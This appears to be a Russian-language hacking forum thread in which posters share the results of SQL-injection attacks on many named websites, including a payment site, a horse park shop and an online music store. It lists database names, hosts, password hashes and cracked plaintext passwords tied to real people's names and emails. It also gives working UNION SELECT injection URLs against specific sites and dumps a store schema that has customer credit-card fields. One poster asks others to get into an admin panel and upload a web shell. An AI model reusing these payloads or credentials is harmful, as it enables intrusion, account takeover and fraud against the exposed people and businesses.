Идём покупать гандончики -)

Database Version: 4.0.16-log
Database name: netcondom
User name: netcondom@localhost


В общем не перебрал таблы буду рад если кто нить что нить -)


И тут же идём покупать еще какие то штучки на четвёрке

4.1.20-log
zipdog@66.165.35.16
zipdog



Ну а если есть Гандоны Антитабачные конфеты то и музыку надо Гы


Database Version: 5.0.41
Database name: lita_main
User name: lita_admin@localhost


Ну а тут мы возьмём целый трактор -)




4.1.22
ferris@localhost
ferris_content


root : 7bf97a0c4adae77a
ferris : 02fb1d2d61d53744
meUser : 5cec7e44730b712f

какой то оманский универ(
4.0.24-nt:squweb:squweb@localhost

Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86)
Apr 14 2006 01:12:25
Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)



Version : 4.1.22
User: eyal@prideenterprises.com
Database: prideenterprises

prideenterprises : 7fd8fd960c3b9d93


Database Version: 5.0.38-Ubuntu_0ubuntu1.4-log
Database name: nekki-gamestyle
User name: gamestyle@localhost

Юзеры


Version:5.0.22
User:translogic@localhost
Database:translogic




Database Version: 5.0.67-community
Database name: web53-dcs187
User name: web53-dcs187@localhost

Администратор



1: mjumbo : mjumbo56




4.1.22
burleigh_sql@localhost
burleigh

Узнал только





Database Version: 5.0.67-log
Database name: aromat4_cart
User name: aromatiks@tootsie.dreamhost.com






Database Version: 4.1.7
Database name: wmsdb
User name: root@localhost

<VirtualHost 172.16.2.13:80>
ServerAdmin webmaster@dummy-host.example.com
DocumentRoot /wwwroot/wms/bananafish
DirectoryIndex index.php
ServerName www.bananafishinc.com
ErrorLog logs/dummy-host.example.com-error_log
CustomLog logs/dummy-host.example.com-access_log common
ErrorDocument 404 /404.php
</VirtualHost>


Там еще в принципе много кто хостится,дальше раскладывать не стал сами можете ведь -)

Читалка хорошо работает




Database Version: 4.1.11-nt
Database name: accust
User name: accustarshop@localhost



Симуляторы хе хе


Version:4.1.20
User:elite@localhost
Database:elite


Че-то тишина сегодня эх.....


Для явщиков -))

Database Version: 5.0.67-community
Database name: richclie_website
User name: richclie_admin@localhost


Козочки -)


Database Version : 5.0.67-community
User name : ovalfram_admin@localhost
Database name : ovalfram_website

магаз экзотики

version::4.1.20
user::www@localhost
database::exotic

ещё один
version::4.1.22-log
user::shopsex@localhost
database::shopsex

Итак на сегодня музыкальный магазин с PageRank = 6

Какая там музыка ууух как приятно было послушать её пока занимался всяким бредом на сайте -)

В общем Магазин там на старом добром OSC с чем-то не вдавался в подробности.

Сильно не заморачивался нашел админов юзеров на магазе да и ордеры -)





Database Version: 5.0.67-log
Database name: putumayosite
User name: putu22@localhost





: putumayo:865caea534cd06838fb39df41f6fe917 : pete@putumayo.com хэш MD5 : 865caea534cd06838fb39df41f6fe917 : put8o
: bent:a0775a76a7b6f7e572dd1cf98a541ed1 : bent@bentmedia.com хэш MD5 : a0775a76a7b6f7e572dd1cf98a541ed1 : mondomix
: andrea:a0775a76a7b6f7e572dd1cf98a541ed1 : andrea@mondomix.com хэш MD5 : a0775a76a7b6f7e572dd1cf98a541ed1 : mondomix
: guest:a0775a76a7b6f7e572dd1cf98a541ed1 : andrea@mondomix.com хэш MD5 : a0775a76a7b6f7e572dd1cf98a541ed1 : mondomix
: underling:a0775a76a7b6f7e572dd1cf98a541ed1 : pete@putumayo.com ; mr.peej@gmail.com хэш MD5 : a0775a76a7b6f7e572dd1cf98a541ed1 : mondomix



В общем база здоровая так часть почти вся смысл остального не вижу....



Database [putumayosite]
Table [agendaevent (0 Rows)]
agendaevent
age_festival
age_date
age_country
age_city
age_salle
age_statut
age_createdate
age_modifdate
age_login
age_category
Table [album (199 Rows)]
album
alb_osc_products_id
alb_number
alb_releasedate
alb_name
alb_comment
alb_texte
alb_prix
alb_support
disable
alb_ecommerce
cassette
alb_unit
alb_key
Table [album_category (283 Rows)]
album_category
acl_album
acl_category
rank
order_str
Table [album_track (2368 Rows)]
album_track
atl_track
atl_album
Table [artist (66 Rows)]
artist
art_name
art_bio
art_photo
art_web
file_ext
art_key
art_country
putu
show_on_page
art_statut
Table [artist_album (262 Rows)]
artist_album
aal_artist
aal_album
Table [artist_concert (855 Rows)]
artist_concert
acl_concert
acl_artist
Table [artist_track (267 Rows)]
artist_track
atl_artist
atl_track
Table [auteur (6 Rows)]
auteur
aut_login
aut_lastname
aut_firstname
aut_pwd
aut_privilege
aut_email
aut_active
aut_type
aut_reportto
aut_name
aut_tel
aut_datecrea
aut_datemod
aut_super
aut_siteversion
Table [category (20 Rows)]
category
cat_osc_categories_id
cat_name
rank
button_img
title_img
image_url
meta_keys
meta_desc
html_title
show_category
cat_order
cat_status
cat_createdate
Table [company (0 Rows)]
company
com_titre
com_texte
com_statut
com_order
com_createdate
com_modifdate
com_login
Table [concert (825 Rows)]
concert
con_date
artist_id
con_salle
con_city
con_comment
con_createdate
con_modifdate
con_login
con_statut
con_site
con_country
Table [contact (3 Rows)]
contact
con_title
con_texte
con_order
con_createdate
con_modifdate
con_login
con_statut
con_image
Table [country (252 Rows)]
country
cou_name
cou_createdate
cou_modifdate
cou_login
Table [discount_coupons (14 Rows)]
coupons_id
coupons_description
coupons_discount_amount
coupons_discount_type
coupons_date_start
coupons_date_end
coupons_max_use
coupons_min_order
coupons_min_order_type
coupons_number_available
Table [discount_coupons_to_categories (0 Rows)]
coupons_id
categories_id
Table [discount_coupons_to_customers (0 Rows)]
coupons_id
customers_id
Table [discount_coupons_to_manufacturers (0 Rows)]
coupons_id
manufacturers_id
Table [discount_coupons_to_orders (480 Rows)]
coupons_id
orders_id
Table [discount_coupons_to_products (0 Rows)]
coupons_id
products_id
Table [discount_coupons_to_zones (0 Rows)]
coupons_id
geo_zone_id
Table [ecommerce (0 Rows)]
ecommerce
eco_region
Table [faquestion (15 Rows)]
faquestion
faq_question
faq_reponse
faq_statut
faq_order
faq_createdate
faq_modifdate
faq_login
Table [festival (17 Rows)]
festival
fes_type
fes_titre
fes_date
fes_comment
fes_region
fes_statut
fes_order
fes_createdate
fes_modifdate
fes_login
fes_category
Table [home (20 Rows)]
home
Table [inscription (11579 Rows)]
inscription
ins_name
ins_address1
ins_address2
ins_city
ins_state
ins_zip
country
ins_email
Mod_Date
created
ins_createdate
ins_modifdate
ins_login
ins_country
ins_cotegory
ins_manycd
Table [international (0 Rows)]
international
int_region
int_category
int_name
int_comment
int_phone
int_fax
int_email
int_web
int_contact
int_createdate
int_modifdate
int_login
Table [jobs (0 Rows)]
jobs
job_titre
job_comments
job_statut
job_order
job_createdate
job_modifdate
job_login
Table [nonprofit (47 Rows)]
nonprofit
pro_name
pro_web
pro_comments
pro_statut
pro_order
pro_createdate
pro_modifdate
pro_login
Table [osc_address_book (11673 Rows)]
address_book_id
customers_id
entry_gender
entry_company
entry_firstname
entry_lastname
entry_street_address
entry_suburb
entry_postcode
entry_city
entry_state
entry_country_id
entry_zone_id
Table [osc_address_format (5 Rows)]
address_format_id
address_format
address_summary
Table [osc_banners (1 Rows)]
banners_id
banners_title
banners_url
banners_image
banners_group
banners_html_text
expires_impressions
expires_date
date_scheduled
date_added
date_status_change
status
Table [osc_banners_history (7 Rows)]
banners_history_id
banners_id
banners_shown
banners_clicked
banners_history_date
Table [osc_categories (31 Rows)]
categories_id
categories_image
parent_id
sort_order
date_added
last_modified
Table [osc_categories_description (69 Rows)]
categories_id
language_id
categories_name
Table [osc_configuration (215 Rows)]
configuration_id
configuration_title
configuration_key
configuration_value
configuration_description
configuration_group_id
sort_order
last_modified
date_added
use_function
set_function
Table [osc_configuration_group (16 Rows)]
configuration_group_id
configuration_group_title
configuration_group_description
sort_order
visible
Table [osc_counter (1 Rows)]
startdate
counter
Table [osc_counter_history (0 Rows)]
month
counter
Table [osc_countries (238 Rows)]
countries_id
countries_name
countries_iso_code_2
countries_iso_code_3
address_format_id
Table [osc_currencies (2 Rows)]
currencies_id
title
code
symbol_left
symbol_right
decimal_point
thousands_point
decimal_places
value
last_updated
Table [osc_customers (9729 Rows)]
customers_id
customers_gender
customers_firstname
customers_lastname
customers_dob
customers_email_address
customers_default_address_id
customers_telephone
customers_fax
customers_password
customers_newsletter
Table [osc_customers_basket (3653 Rows)]
customers_basket_id
customers_id
products_id
customers_basket_quantity
final_price
customers_basket_date_added
Table [osc_customers_basket_attributes (0 Rows)]
customers_basket_attributes_id
customers_id
products_id
products_options_id
products_options_value_id
Table [osc_customers_info (9730 Rows)]
customers_info_id
customers_info_date_of_last_logon
customers_info_number_of_logons
customers_info_date_account_created
customers_info_date_account_last_modified
global_product_notifications
Table [osc_geo_zones (4 Rows)]
geo_zone_id
geo_zone_name
geo_zone_description
last_modified
date_added
Table [osc_languages (1 Rows)]
languages_id
name
code
image
directory
sort_order
Table [osc_manufacturers (0 Rows)]
manufacturers_id
manufacturers_name
manufacturers_image
date_added
last_modified
Table [osc_manufacturers_info (0 Rows)]
manufacturers_id
languages_id
manufacturers_url
url_clicked
date_last_click
Table [osc_newsletters (0 Rows)]
newsletters_id
title
content
module
date_added
date_sent
status
locked
Table [osc_orders (9622 Rows)]
orders_id
customers_id
customers_name
customers_company
customers_street_address
customers_suburb
customers_city
customers_postcode
customers_state
customers_country
customers_telephone
customers_email_address
customers_address_format_id
delivery_name
delivery_company
delivery_street_address
delivery_suburb
delivery_city
delivery_postcode
delivery_state
delivery_country
delivery_address_format_id
billing_name
billing_company
billing_street_address
billing_suburb
billing_city
billing_postcode
billing_state
billing_country
billing_address_format_id
payment_method
cc_type
cc_owner
cc_number
cc_expires
last_modified
date_purchased
orders_status
orders_date_finished
currency
currency_value
cc_ccv
giftwrap
Table [osc_orders_freegift (4313 Rows)]
orders_freegift_id
orders_id
products_id
products_model
products_name
Table [osc_orders_products (26609 Rows)]
orders_products_id
orders_id
products_id
products_model
products_name
products_price
final_price
products_tax
products_quantity
Table [osc_orders_products_attributes (0 Rows)]
orders_products_attributes_id
orders_id
orders_products_id
products_options
products_options_values
options_values_price
price_prefix
Table [osc_orders_products_download (0 Rows)]
orders_products_download_id
orders_id
orders_products_id
orders_products_filename
download_maxdays
download_count
Table [osc_orders_status (3 Rows)]
orders_status_id
language_id
orders_status_name
Table [osc_orders_status_history (9938 Rows)]
orders_status_history_id
orders_id
orders_status_id
date_added
customer_notified
comments
Table [osc_orders_total (29240 Rows)]
orders_total_id
orders_id
title
text
value
class
sort_order
Table [osc_products (358 Rows)]
products_id
products_quantity
products_model
products_image
products_price
products_date_added
products_last_modified
products_date_available
products_weight
products_status
products_tax_class_id
manufacturers_id
products_ordered
Table [osc_products_attributes (2 Rows)]
products_attributes_id
products_id
options_id
options_values_id
options_values_price
price_prefix
Table [osc_products_attributes_download (1 Rows)]
products_attributes_id
products_attributes_filename
products_attributes_maxdays
products_attributes_maxcount
Table [osc_products_description (357 Rows)]
products_id
language_id
products_name
products_description
products_url
products_viewed
Table [osc_products_notifications (3 Rows)]
products_id
customers_id
date_added
Table [osc_products_options (7 Rows)]
products_options_id
language_id
products_options_name
Table [osc_products_options_values (14 Rows)]
products_options_values_id
language_id
products_options_values_name
Table [osc_products_options_values_to_products_options (14 Rows)]
products_options_values_to_products_options_id
products_options_id
products_options_values_id
Table [osc_products_to_categories (550 Rows)]
products_id
categories_id
Table [osc_reviews (0 Rows)]
reviews_id
products_id
customers_id
customers_name
reviews_rating
date_added
last_modified
reviews_read
Table [osc_reviews_description (0 Rows)]
reviews_id
languages_id
reviews_text
Table [osc_sessions (0 Rows)]
sesskey
expiry
value
Table [osc_specials (0 Rows)]
specials_id
products_id
specials_new_products_price
specials_date_added
specials_last_modified
expires_date
date_status_change
status
Table [osc_tax_class (1 Rows)]
tax_class_id
tax_class_title
tax_class_description
last_modified
date_added
Table [osc_tax_rates (1 Rows)]
tax_rates_id
tax_zone_id
tax_class_id
tax_priority
tax_rate
tax_description
last_modified
date_added
Table [osc_whos_online (39 Rows)]
customer_id
full_name
session_id
ip_address
time_entry
time_last_click
last_page_url
Table [osc_zones (168 Rows)]
zone_id
zone_country_id
zone_code
zone_name
Table [osc_zones_to_geo_zones (236 Rows)]
association_id
zone_country_id
zone_id
geo_zone_id
last_modified
date_added
Table [partner (9 Rows)]
partner
par_name
par_logo
par_web
par_comment
par_statut
par_order
par_createdate
par_modifdate
par_login
par_type
Table [playlist (3841 Rows)]
show_start_date
pla_position
pla_titre
pla_artist
pla_country
pla_album
pla_label
include
show_title
wee_startdate
wee_enddate
playlist
pla_week
pla_statut
pla_createdate
pla_modifdate
pla_login
pla_urlartist
Table [prefs (412 Rows)]
prf_auteur
prf_class
prf_fieldname
prf_affichage
prf_affichageapercu
prf_actiondata_subs
Table [radio (179 Rows)]
radio
rad_city
rad_country
state_id
rad_freq
airdate_spotlight
rad_time
rad_web
rad_station
radiolist
spotlight
last_update
rad_name
Table [states (66 Rows)]
abbr
state
state_id
ctr
Table [staticpages (2 Rows)]
staticpages
sta_page
sta_contentpage
sta_createdate
sta_modifdate
sta_login
Table [support (9 Rows)]
support
sup_osc_categories_id
sup_name
sup_createdate
sup_modifdate
sup_login
suffix
format
sup_code
Table [tablelist (22 Rows)]
tablelist
tbl_name
Table [track (2386 Rows)]
track
tra_title
tra_artist
tra_sample
item_id
tra_position
rank
tra_nunit
tra_urlartist
tra_urltarget
tra_createdate
tra_modifdate
tra_login
tra_statut
tra_samplewm
Table [uscanadadistrib (18 Rows)]
uscanadadistrib
usc_type
usc_name
usc_comment
usc_phone
usc_fax
usc_email
usc_web
usc_contact
usc_statut
usc_createdate
usc_modifdate
usc_login
usc_category
usc_order
usc_country
Table [week (247 Rows)]
wee_title
wee_startdate
wee_enddate
wee_createdate
wee_modifdate
wee_login
week

Сайт платежной системы www.qiwi.ru

http://www.qiwi.ru/site/?news&id=57+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT (CONCAT(0x536d6f747269207379756461202d2d2d3e,Versi on(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71 ),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28+LIMIT+1,1/*

Database Version: 4.1.22-log
Database name: joomla
User name: joomla@www.osmp.ru

Подобрал только jos_users

http://www.qiwi.ru/site/?news&id=57+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT (CONCAT_WS(0x3a,email,gid,id,name,0x566f742065746f 207061726f6c5c272076204d44352d2d3e,password,sendem ail,username),0x71),0x71),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+FRO M+jos_users+LIMIT+3,1/*

[0]:mum@osmp.ru:25:62:Administrator:1cd87f5976c0893cb 50d0758f528963f:1:admin pass q1w2e3r4t5y6
[1]:creann@osmp.ru:25:63:Сергей Халилов:1cd87f5976c0893cb50d0758f528963f:0: creann pass cracked q1w2e3r4t5y6
[2]:t.susorova@osmp.ru:23:65:Татьяна Сусорова:827ccb0eea8a706c4c34a16891f84e7b: 0:soleil
pass cracked 123456


админка
www.qiwi.ru/new/administrator

на момент написания админка загружалась... но пасс не подходил...
Спасиб всем !

Kentucky Horse Park | Lexington, KY Магазин


Database Version: 5.0.27-community-nt
Database name: test
User name: eleuser05@localhost

Берём рута



root : *D9CE563515E8C4166F66D84C2EAA499221AA6889




Файло лить можно -)



Тут глобальные Админы


http://www.kyhorsepark.com/detail.php?select=3067798798765+UNION+SELECT+1,2,3 ,4,5,CONCAT(0x3a,(SELECT+CONCAT(Name,0x3a,userid,0 x3a,pass,0x3a,Global)+FROM+test.khp_administrators +LIMIT+3,1),0x3a),7,8,9,10,11,12,13,14,15,16,17,18--&pageid=87&sectionid=15&cat=06&page=Online%20Gift% 20Shop


[1] : Amy Shaw:ashaw : pass123 : Yes
[2] : Chris Gowin:cgowin : pass123 : Yes
[3] : Gina Gibson:ggibson : dogs*blues : Yes
[4] : Lisa Jackson:ljackson : ringo : Yes
[5] : Jodi Dickey:jdickey : horse : Yes
[6] : Cindy Armstrong:carmstrong : neeter : Yes
[7] : Kathy Hopkins:khopkins : tory : Yes
[8] : Laurie Brown:lbrown : guinness : Yes




Это типа куда че надо лезть -)

В общем зе енд -)


PageRank = 6


Database Version: 5.0.67-log
Database name: grnleaf_catalog
User name: grnleaf@209.68.1.65



Encore Electronics Inc !


Database Version: 5.0.67-community-log
Database name: encoreus_website1
User name: encoreus_yroot@localhost


Database Version: 4.0.15-standard
User name: tcrdc@localhost
Database name: cunningham


Database Version: 4.1.22
User name: clublaugh@localhost
Database name: clublaugh




Database Version: 4.1.22
User name: fir5tal3rt@localhost
Database name: firstalert


Япона мат! -)



Database Version: 4.0.27
User name: wakofirm@219.94.155.138
Database name: wakofirm




А тут такая музыка приятная играет прям ощущаешь себя в лесу возле костра...


Version:4.1.13
User:db_user062000_1@localhost
Database:db062000_1



MRLocks Security System! Во как.

Version:4.1.21-Max-log
User:u1060631_mrlocks@172.20.18.69
Database:db1060631_mrlocks

PR 6
admin:cardinal,
мб админка фейк т.к. в админ панель не пускает под gid=25(админ правами),или идет хак с превязкой к ип для админов.

Все сайты на данном хосте имеют уязвимость...выложу только один из них
В админку зайти не получается, скорей всего привязка к айпи... если у кого нибудь получится зайти а еще лучше залить шелл буду очень признателен ибо надо добратся до одного сайта на хосте. Заранее спасибо.
http://www.tshirts.ro/shop_add.php?pid=-116+UNION+SELECT+1,Concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14--%20&ownerid=63

Database Version: 5.0.27-log
Database name: tsh
User name: tsh@htdweb